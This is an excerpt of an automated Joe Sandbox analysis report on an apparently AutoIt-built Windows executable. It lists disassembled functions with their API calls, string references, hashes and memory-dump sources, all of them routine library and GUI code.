Opcode Fuzzy Hash: e24027fb457f39b0feb1a5314ba5441f87eb722103ed81f579dff0e3147c0ad3
Instruction Fuzzy Hash: F4019271901B129BCB12AF68D8067AD73A0FF06715F094219F418A7791CF389942EFF2

Function 00D68724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00D68768

Part of subcall function 00D68984: __mtinitlocknum.LIBCMT ref: 00D68996
Part of subcall function 00D68984: RtlEnterCriticalSection.NTDLL(00D60127), ref: 00D689AF

InterlockedIncrement.KERNEL32(DC840F00), ref: 00D68775
__lock.LIBCMT ref: 00D68789
___addlocaleref.LIBCMT ref: 00D687A7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 703e49a343ee55a83da76486c010bc5a0973cc4cfafcc418ecf80f3b6f1f4445
Instruction ID: 4f4e8ef5fa05de6d874ef80075084d90c6b28f4598911f1af2d2c3cfc7b14459
Opcode Fuzzy Hash: 703e49a343ee55a83da76486c010bc5a0973cc4cfafcc418ecf80f3b6f1f4445
Instruction Fuzzy Hash: 01016DB1401B05AFD720EF75D806759B7E0EF44329F208A0EE09A877A0CB70A644DF31

Function 00D89C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 00D89C7F

Part of subcall function 00D8AD14: _memset.LIBCMT ref: 00D8AD49

_memmove.LIBCMT ref: 00D89CA2
_memset.LIBCMT ref: 00D89CAF
RtlLeaveCriticalSection.NTDLL(?), ref: 00D89CBF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 4c03ab5c82a787676301ba2920420a389a971d0223262f63c2426f8433975a22
Instruction ID: 60d6c7bc187cde04e9edf4af389316ef151974106cf61f6c11d23129ccf833cf
Opcode Fuzzy Hash: 4c03ab5c82a787676301ba2920420a389a971d0223262f63c2426f8433975a22
Instruction Fuzzy Hash: 80F0307A200100ABCF016F54DC85E49BB29EF45321B08C062FE089E217C731A811DBB5

Function 00DAE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D5B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B5FA
Part of subcall function 00D5B58B: BeginPath.GDI32(?), ref: 00D5B611
Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B63B

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DAE860
LineTo.GDI32(00000000,?,?), ref: 00DAE86D
EndPath.GDI32(00000000), ref: 00DAE87D
StrokePath.GDI32(00000000), ref: 00DAE88B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 69f96d12b575dd8e9ef243e987cb3982a2cbaa501edcb9d8ca62a5879a2e170a
Instruction ID: eba3cf527a97425b9d98965ffa2b34252c654f2dc2d62e0dc099b0c5c7b838ff
Opcode Fuzzy Hash: 69f96d12b575dd8e9ef243e987cb3982a2cbaa501edcb9d8ca62a5879a2e170a
Instruction Fuzzy Hash: 51F0BE3200035BBADB161F58AC09FCA3F9AAF06311F048151FE01651E1C3798656DFB5

Function 00D7D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D7D640
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D653
GetCurrentThreadId.KERNEL32 ref: 00D7D65A
AttachThreadInput.USER32(00000000), ref: 00D7D661

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4f48ef5c1e3043c706266aa85641e4816789b5af2d7f4c0338f8020e362fcdf5
Instruction ID: 54f8785c5c9194882ac9e4cc716d3ef9901c02914fed0b255560225f42c1a69c
Opcode Fuzzy Hash: 4f48ef5c1e3043c706266aa85641e4816789b5af2d7f4c0338f8020e362fcdf5
Instruction Fuzzy Hash: 0AE0393114132EBADB205BA29C0DFDB7F2EEF117A1F008020B50CC5160DA719580CBB0

Function 00D5B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00D5B0C5
SetTextColor.GDI32(?,000000FF), ref: 00D5B0CF
SetBkMode.GDI32(?,00000001), ref: 00D5B0E4
GetStockObject.GDI32(00000005), ref: 00D5B0EC
GetWindowDC.USER32(?,00000000), ref: 00DBECFA
GetPixel.GDI32(00000000,00000000,00000000), ref: 00DBED07
GetPixel.GDI32(00000000,?,00000000), ref: 00DBED20
GetPixel.GDI32(00000000,00000000,?), ref: 00DBED39
GetPixel.GDI32(00000000,?,?), ref: 00DBED59
ReleaseDC.USER32(?,00000000), ref: 00DBED64

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d03a21c009bfce7f2c9d890ad601c8a5a0b22806da47e04d056c122b870c28f9
Instruction ID: e18ca0e3acb1ad5d53bd788bdd90c853e17692f924a6b2b6e4e98bbe20d58cf4
Opcode Fuzzy Hash: d03a21c009bfce7f2c9d890ad601c8a5a0b22806da47e04d056c122b870c28f9
Instruction Fuzzy Hash: 22E06D31100342EEEF211F74EC09BC83F22AB06336F088226FA6A980E6C3B18540CB31

Function 00DBC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00DBC0A0
GetDC.USER32(00000000), ref: 00DBC0AA
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBC0C9
ReleaseDC.USER32 ref: 00DBC0E8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2c8434217d0bc05068fbc0d84db96a6248962920c0e15516937273713e2af2d5
Instruction ID: 8dfb1a51fb26ecec119045196af29cceadce1c56d2c837bdadfd359b54728da1
Opcode Fuzzy Hash: 2c8434217d0bc05068fbc0d84db96a6248962920c0e15516937273713e2af2d5
Instruction Fuzzy Hash: 7CE01AB1540306EFDB006F708C48A697BA6EB48351F118425FC4AC7350DA7499819B24

Function 00DBC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00DBC0B4
GetDC.USER32(00000000), ref: 00DBC0BE
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBC0C9
ReleaseDC.USER32 ref: 00DBC0E8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3447873d9f70cb4ec0fab502108f0ea6cc26e7c1d017d2c0bc6229e017365b34
Instruction ID: f1ae357585a7ec4dd7961087df1fa223731e97b3cf3f91d5535aa969f80cd547
Opcode Fuzzy Hash: 3447873d9f70cb4ec0fab502108f0ea6cc26e7c1d017d2c0bc6229e017365b34
Instruction Fuzzy Hash: 23E04FB1540306EFDB005F70CC48A697BA6EB4C351F118425FD4AC7350DB74A941CB20

Function 00DC2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D467D0

Strings

DEFINE, xrefs: 00DC265C
>, xrefs: 00DC2414

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: >$DEFINE
API String ID: 4104443479-1664449232
Opcode ID: b6b7349c8407d0fe53c60c125daae37a278362ad09da5d7b5a29e781300d9f9f
Instruction ID: f217bfa73d4ad2d9901c04ff2ce07eb6ecee3ede0999f67bde3efb716dea0951
Opcode Fuzzy Hash: b6b7349c8407d0fe53c60c125daae37a278362ad09da5d7b5a29e781300d9f9f
Instruction Fuzzy Hash: A8123875A0020ADFCB28CF58C490ABDBBB1FF59314F29815AE855AB351D730ED81DBA0

Function 00D7EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00D7ECA0

Strings

AutoIt3GUI, xrefs: 00D7EC18
Container, xrefs: 00D7EC1F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 04f096101c8c26a7329bf0b9f4d7de39740d8b00449cc55b0a180d1da78b4254
Instruction ID: 051150c39775cbe2a345ae41fa415044fb3580f8a154bd80fd1942422d8a4a3c
Opcode Fuzzy Hash: 04f096101c8c26a7329bf0b9f4d7de39740d8b00449cc55b0a180d1da78b4254
Instruction Fuzzy Hash: 75911874600701AFDB64DF64C885B66BBA5FF49710B1485ADF94ACB291EBB0E841CB60

Function 00D8E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

__wcsnicmp.LIBCMT ref: 00D8E785
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D8E84E

Strings

LPT, xrefs: 00D8E77F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 2d1ad5f1c178bc4c80ca7d7881cb1231b6d1b5a4944acd53997d6bda02d4de28
Instruction ID: 5a3f1e8777aecf977d2645026556875238d48344ce1e9703b68eaafa6ca2fbd3
Opcode Fuzzy Hash: 2d1ad5f1c178bc4c80ca7d7881cb1231b6d1b5a4944acd53997d6bda02d4de28
Instruction Fuzzy Hash: 57616D75A00215AFCB14EF98C891EAEB7B9EF49310F05406AF546AB290DB70EE44DF70

Function 00D41B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D41B83
GlobalMemoryStatusEx.KERNEL32 ref: 00D41B9C

Strings

@, xrefs: 00D41B91

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: e818999cfafa8b5f7b89c9286dc6a352abe34286fb4b79183dc9296033a692c5
Instruction ID: e4b2f45a1e70e8bc9c216e6fe92a412c389ce755ef96cbccd6a95e42f3663359
Opcode Fuzzy Hash: e818999cfafa8b5f7b89c9286dc6a352abe34286fb4b79183dc9296033a692c5
Instruction Fuzzy Hash: 53513571408744ABE720AF14D885BBBBBE8FB99355F41484DF9C8811A1EB71856CCB62

Function 00D8CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00D4417D: __fread_nolock.LIBCMT ref: 00D4419B

_wcscmp.LIBCMT ref: 00D8CF49
_wcscmp.LIBCMT ref: 00D8CF5C

Strings

FILE, xrefs: 00D8CE91

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 590a343d351aa4611667b91606d13a0c3bf0a96be3242ea3b414e4b45e59dad6
Instruction ID: f65d0d0c432a435c03d22267ba06452a05d16e4c441d119a95b00630f372ac07
Opcode Fuzzy Hash: 590a343d351aa4611667b91606d13a0c3bf0a96be3242ea3b414e4b45e59dad6
Instruction Fuzzy Hash: 81419332A14219BBDF11EBA4CC81FEF7BBAEF59714F00446AF601A7191D7719A848B70

Function 00DAA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DAA668
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DAA67D

Strings

', xrefs: 00DAA5D1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 135e03c7738ecd16f850094112cbe6cec772cc1f860b2d9a9df719ce639282d8
Instruction ID: 99bfa768009b077a9411081cc0e18994c4bf8bb664e2486f7a78ece89e270346
Opcode Fuzzy Hash: 135e03c7738ecd16f850094112cbe6cec772cc1f860b2d9a9df719ce639282d8
Instruction Fuzzy Hash: D041F575E0020A9FDB14CFA9C881BDA7BB5FB09300F18456AE905AB381D771A945CFA1

Function 00D957D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D957E7
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00D9581D

Strings

|, xrefs: 00D9580C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: e1eecd38065f12cb84c53e9f593fbec1b3f416e52feab509adbf650633b30214
Instruction ID: f6e49b08f093d32e2c748863fb97d23af13f9a0baff72160616f502b483e7ac6
Opcode Fuzzy Hash: e1eecd38065f12cb84c53e9f593fbec1b3f416e52feab509adbf650633b30214
Instruction Fuzzy Hash: 7E313B71810219EBCF11AFA0DC95EEE7FB9FF18340F104129F815A6166EB319A46DB70

Function 00DA9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00DA961B
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DA9657

Strings

static, xrefs: 00DA95B7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e879b7de3023376b4099bb20df107726030c021adab9032ce01b291ab971dd45
Instruction ID: afd29bf5edfa224c19fda2844538b8ae7cda3ea95e2fd9e7884792ab9fde865b
Opcode Fuzzy Hash: e879b7de3023376b4099bb20df107726030c021adab9032ce01b291ab971dd45
